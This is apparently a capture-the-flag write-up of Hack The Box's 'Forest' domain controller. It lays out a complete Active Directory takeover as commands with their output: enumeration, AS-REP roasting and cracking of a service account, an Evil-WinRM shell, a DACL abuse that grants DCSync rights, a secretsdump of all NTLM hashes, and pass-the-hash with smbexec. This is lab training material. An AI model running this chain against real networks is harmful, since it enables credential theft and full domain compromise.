Enumeration

nmap scan

➜ mostwanted002@Loki Forest please nmap -sC -sV -T3 -oA nmap-tcp-all-ports -p- -iL ip.txt
[sudo] password for mostwanted002:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-23 18:24 IST
Nmap scan report for 10.129.95.210 (10.129.95.210)
Host is up (0.074s latency).
Not shown: 65512 closed tcp ports (reset)
PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Simple DNS Plus
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2022-06-23 13:01:56Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49680/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49681/tcp open  msrpc        Microsoft Windows RPC
49685/tcp open  msrpc        Microsoft Windows RPC
49701/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2022-06-23T13:02:50
|_  start_date: 2022-06-23T12:59:00
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2022-06-23T06:02:46-07:00
|_clock-skew: mean: 2h26m51s, deviation: 4h02m29s, median: 6m50s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 117.20 seconds

1. It is found that Kerberos Domain Controller is available on the remote target, which implies:
   1. Host is a part of an Active Directory Domain (htb.local) (from nmap)
   2. Host is a domain controller. (Windows Server 2016) (from nmap)

RPC Enumeration

1. Enumerating AD properties using rpcclient provides following information:

   Domain Info

      
   rpcclient $> querydominfo
   Domain:         HTB
   Server:
   Comment:
   Total Users:    105
   Total Groups:   0
   Total Aliases:  0
   Sequence No:    1
   Force Logoff:   -1
   Domain Server State:    0x1
   Server Role:    ROLE_DOMAIN_PDC
   Unknown 3:      0x1
      
   rpcclient $> lookupdomain htb.local                                                                                                                                                                                                                                                     SAMR_LOOKUP_DOMAIN: Domain Name: htb.local Domain SID: S-1-5-21-3072663084-364016917-1341370565
   

   Domain Users

   rpcclient $> enumdomusers
   user:[Administrator] rid:[0x1f4]
   user:[Guest] rid:[0x1f5]
   user:[krbtgt] rid:[0x1f6]
   user:[DefaultAccount] rid:[0x1f7]
   user:[$331000-VK4ADACQNUCA] rid:[0x463]
   user:[SM_2c8eef0a09b545acb] rid:[0x464]
   user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
   user:[SM_75a538d3025e4db9a] rid:[0x466]
   user:[SM_681f53d4942840e18] rid:[0x467]
   user:[SM_1b41c9286325456bb] rid:[0x468]
   user:[SM_9b69f1b9d2cc45549] rid:[0x469]
   user:[SM_7c96b981967141ebb] rid:[0x46a]
   user:[SM_c75ee099d0a64c91b] rid:[0x46b]
   user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
   user:[HealthMailboxc3d7722] rid:[0x46e]
   user:[HealthMailboxfc9daad] rid:[0x46f]
   user:[HealthMailboxc0a90c9] rid:[0x470]
   user:[HealthMailbox670628e] rid:[0x471]
   user:[HealthMailbox968e74d] rid:[0x472]
   user:[HealthMailbox6ded678] rid:[0x473]
   user:[HealthMailbox83d6781] rid:[0x474]
   user:[HealthMailboxfd87238] rid:[0x475]
   user:[HealthMailboxb01ac64] rid:[0x476]
   user:[HealthMailbox7108a4e] rid:[0x477]
   user:[HealthMailbox0659cc1] rid:[0x478]
   user:[sebastien] rid:[0x479]
   user:[lucinda] rid:[0x47a]
   user:[svc-alfresco] rid:[0x47b]
   user:[andy] rid:[0x47e]
   user:[mark] rid:[0x47f]
   user:[santi] rid:[0x480]
      
   

   Domain Groups

   rpcclient $> enumdomgroups
   group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
   group:[Domain Admins] rid:[0x200]
   group:[Domain Users] rid:[0x201]
   group:[Domain Guests] rid:[0x202]
   group:[Domain Computers] rid:[0x203]
   group:[Domain Controllers] rid:[0x204]
   group:[Schema Admins] rid:[0x206]
   group:[Enterprise Admins] rid:[0x207]
   group:[Group Policy Creator Owners] rid:[0x208]
   group:[Read-only Domain Controllers] rid:[0x209]
   group:[Cloneable Domain Controllers] rid:[0x20a]
   group:[Protected Users] rid:[0x20d]
   group:[Key Admins] rid:[0x20e]
   group:[Enterprise Key Admins] rid:[0x20f]
   group:[DnsUpdateProxy] rid:[0x44e]
   group:[Organization Management] rid:[0x450]
   group:[Recipient Management] rid:[0x451]
   group:[View-Only Organization Management] rid:[0x452]
   group:[Public Folder Management] rid:[0x453]
   group:[UM Management] rid:[0x454]
   group:[Help Desk] rid:[0x455]
   group:[Records Management] rid:[0x456]
   group:[Discovery Management] rid:[0x457]
   group:[Server Management] rid:[0x458]
   group:[Delegated Setup] rid:[0x459]
   group:[Hygiene Management] rid:[0x45a]
   group:[Compliance Management] rid:[0x45b]
   group:[Security Reader] rid:[0x45c]
   group:[Security Administrator] rid:[0x45d]
   group:[Exchange Servers] rid:[0x45e]
   group:[Exchange Trusted Subsystem] rid:[0x45f]
   group:[Managed Availability Servers] rid:[0x460]
   group:[Exchange Windows Permissions] rid:[0x461]
   group:[ExchangeLegacyInterop] rid:[0x462]
   group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
   group:[Service Accounts] rid:[0x47c]
   group:[Privileged IT Accounts] rid:[0x47d]
   group:[test] rid:[0x13ed]
      
   

   Domain Password Policy

   rpcclient $> getdompwinfo
   min_password_length: 7
   password_properties: 0x00000000
   

2. A service account is found svc-alfresco . Enumerating further on this user, the user has default password policy (minimum 7 characters, no restrictions). Nothing interesting was found in user properties as well.

   rpcclient $> queryuser svc-alfresco
           User Name   :   svc-alfresco
           Full Name   :   svc-alfresco
           Home Drive  :
           Dir Drive   :
           Profile Path:
           Logon Script:
           Description :
           Workstations:
           Comment     :
           Remote Dial :
           Logon Time               :      Mon, 23 Sep 2019 16:39:48 IST
           Logoff Time              :      Thu, 01 Jan 1970 05:30:00 IST
           Kickoff Time             :      Thu, 01 Jan 1970 05:30:00 IST
           Password last set Time   :      Thu, 23 Jun 2022 18:59:18 IST
           Password can change Time :      Fri, 24 Jun 2022 18:59:18 IST
           Password must change Time:      Thu, 14 Sep 30828 08:18:05 IST
           unknown_2[0..31]...
           user_rid :      0x47b
           group_rid:      0x201
           acb_info :      0x00010210
           fields_present: 0x00ffffff
           logon_divs:     168
           bad_password_count:     0x00000000
           logon_count:    0x00000006
           padding1[0..7]...
           logon_hrs[0..21]...
   

3. Since this is a service account, DONT_REQ_PREAUTH can be checked on it to verify if this account is vulnerable to ASREPRoast or not.

Initial Foothold

1. Checking for Named Principal User using impacket script GetNPUsers.py turns out to be successful, which implies the user svc-alfresco is ASREPRoastable. Getting the hash in hashcat format with following command and cracking it gives the password for the user svc-alfresco

   GetNPUsers.py -dc-ip 10.129.95.210 htb.local/svc-alfresco -no-pass -format hashcat -outputfile svc-alfresco.hash
      
   Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
      
   [*] Getting TGT for svc-alfresco
   $krb5asrep$23$svc-alfresco@HTB.LOCAL:ee847ee87b8cce1fe6c245e4b1c2a06a$c6fb069422c97e501123a9226dc24cb839c3aa4d1a0e17bb0a588423e94a354c70afdf4499dbf3b20236bb75bcf745b7a77b9e56f602b19171712ce2eb0f00e177c98496d776a5fcd0d38b53f9da50d13721bfe7e8ff2ae9086409a785e357feb15f8af3a18afa60e0bec55f8ceffe81a8538fd1c23243131cc70c92e51e3508c5d96771eeb90926aa8a8e2e29caca998d9dcc34bc51173b3f38cf158c6d308387160816737c9ba327d12e60feb87a9de6098a863feec4be8b28fc9852efb32c9e1acbe51cffdc72c757d92c47d4d132cde6b24e873887f21ec944983b85289fcd7a06a23f67
   

   The hashcat mode is 18200 for Kerberos 5, AS-REP. The password was successfully cracked using rockyou.txt wordlist.

   

2. Valid credentials, svc-alfresco:s3rvice are obtained.

3. Using Evil-WinRM, a valid remote powershell session is obtained.

   evil-winrm -u svc-alfresco -p s3rvice -i forest.htb.local
      
   # forest.htb.local => IP of the remote host.
   

   

Privilege Escalation

Active Directory Mapping and Enumeration

Bloodhound and Sharphound

1. Since this is an Active Directory Scenario, Bloodhound can be used to draw the layout of AD structure and can help in further enumeration.
2. Invoking SharpHound with all collection methods and analysing the data in Bloodhound provides the following valuable information:

   1. svc-alfresco@htb.local is a member of Service Accounts domain group.

   2. Service Accounts domain group is a member of Privileged IT Accounts domain group.

   3. Privileged IT Accounts domain is a member of Account Operators domain group.

   4. Accounts Operators domain group has GenricAll DACL (Discretionary Access Control List) on most of the domain groups. GenericAll DACL allows full control on the object.

   5. Out of all the domain groups, the one with interesting DACL is Exchange Windows Permissions domain group. It has WriteDacl on the entire domain HTB.LOCAL.

      

   6. On reading the help text for WriteDacl in Bloodhound, it is found that a user can be added with DCSync rights in the domain, which can then perform.

      

Exploitation

1. Since svc-alfresco transitively has rights on Users domain group and Exchange Windows Permissions group, a user can be created and added to the privileged group.+

   net.exe user john password123 /add /domain
   net.exe group 'exchange windows permissions' john /add
   

2. Since the next commands are needed to be run as htb\john and htb\john cannot PSRemote onto the domain controller, [DCSync.py](https://github.com/n00py/DCSync) can be used to provide htb\john with DCSync rights.

   python3 ./DCSync.py -dc forest.htb.local -t 'CN=john,CN=Users,DC=htb,DC=local' 'htb\john:password123'
   Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
      
   [*] Starting DCSync Attack against CN=john,CN=Users,DC=htb,DC=local
   [*] Initializing LDAP connection to forest.htb.local
   [*] Using htb\john account with password ***
   [*] LDAP bind OK
   [*] Initializing domainDumper()
   [*] Initializing LDAPAttack()
   [*] Querying domain security descriptor
   [*] Success! User john now has Replication-Get-Changes-All privileges on the domain
   [*] Try using DCSync with secretsdump.py and this user :)
   [*] Saved restore state to aclpwn-20220626-001031.restore
   

3. Now, a DCSync can be performed with the user htb\john and NTLM hashes for all the users in the domain can now be obtained.

   secretsdump.py 'htb/john:password123@htb.local' -target-ip 10.129.224.200 -dc-ip 10.129.224.200
      
   Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
      
   [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
   [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
   [*] Using the DRSUAPI method to get NTDS.DIT secrets
   htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
   Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
   krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
   DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
   htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
   htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::
   htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
   htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
   htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::
   htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
   htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
   john:10101:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da:::
   FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:20a870de75e825622c71d13adcf223cb:::
   EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
   ...
   ...
   ...
   

4. After the DCSync rights are obtained successfully, a remote session on the domain controller can now be obtained using smbexec.py from Impacket toolkit.

   smbexec.py -dc-ip 10.129.95.210 htb.local/Administrator@forest.htb.local -hashes "aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6"
   

   

The remote target active directory environment is now completely compromised. For persistence, a Golden-Ticket can be issued using krbtgt hash dumped from DCSync.